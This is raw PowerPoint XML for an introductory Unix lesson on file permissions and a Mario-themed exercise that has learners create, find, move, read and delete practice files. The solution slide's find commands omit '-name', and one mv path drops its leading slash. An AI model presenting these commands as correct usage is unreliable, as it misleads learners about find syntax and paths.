                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-w---x</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="2308E8"/>
                </a:solidFill>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Owner: Read/Write/Execute; Group: Write; Global: Execute</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="2308E8"/>
              </a:solidFill>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>What permissions does each user have for the following code:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>567</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="2308E8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Owner: Read/Execute; Group: Read/Write; Global: Read/Write/Execute</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="2308E8"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="596768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a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Being Careful with Permissions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IN GENERAL: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>O</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>ut in the real world you want to enable as few permissions as necessary</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>You do not want to give Global many permissions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Why not?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2353023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a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Being Careful with Permissions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IN GENERAL: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>O</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>ut in the real world you want to enable as few permissions as necessary</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>You do not want to give Global many permissions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Why not?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="2308E8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>For the same reason you don’t leave the door to your house unlocked – you don’t want people getting in there and messing around</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="2308E8"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35386828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 4: </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Your Princess is in Another Castle</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="628650" y="1825624"/>
            <a:ext cx="7886700" cy="4725077"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Goal: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Navigate to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>exercise4</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Make a file called </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Mario.txt</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Find the file </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Bowser.txt </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Move </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Mario.txt </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>to the location of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Bowser.txt</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Output the text of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Bowser.txt </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>to determine how to ‘defeat’ Bowser</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>After ‘defeating’ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Bowser.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, find the file </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Princess-Peach.txt </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>and move it and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Mario.txt </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>exercise4/mushroom-kingdom/castle</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Lock down (by changing permissions) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>mushroom-kingdom/castle</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> so that no one (including you) can enter!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0">
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Hint:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>You can move multiple files at once via:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="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mv &lt;file1&gt; &lt;file2&gt; &lt;destination&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400"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9884762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 4: </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Your Princess is in Another Castle</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="628650" y="1653098"/>
            <a:ext cx="7886700" cy="5032376"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Goal: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Navigate to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>exercise4 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2308E8"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(cd exercise4)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Make a file called </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Mario.txt </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2308E8"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(touch Mario.txt)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Find the file </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Bowser.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2308E8"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>find . </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="2308E8"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Bowser.txt</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Move </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Mario.txt </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>to the location of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Bowser.txt</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2308E8"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>mv Mario.txt </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="2308E8"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>World5/Level5-4/Another-Castle/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="2308E8"/>
              </a:solidFill>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Output the text of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Bowser.txt </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>to determine how to ‘defeat’ Bowser</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2308E8"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>cat Bowser.txt</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2308E8"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2308E8"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>touch Axe.txt</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2308E8"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="2308E8"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>rm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2308E8"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> Bowser.txt</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>After ‘defeating’ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Bowser.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, find the file </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Princess-Peach.txt </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>and move it and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Mario.txt </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>exercise4/mushroom-kingdom/castle/</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2308E8"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>find </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="2308E8"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2308E8"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Princess-Peach.txt</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2308E8"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2308E8"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>mv Princess-Peach.txt </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="2308E8"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Mario.txt home/20170301-basic-unix/exercise4/mushroom-kingdom/castle</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="2308E8"/>
              </a:solidFill>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Lock down (by changing permissions) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>mushroom-kingdom/castle</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> so that no one (including you) can enter</a:t>
            </a:r>
            <a:r>
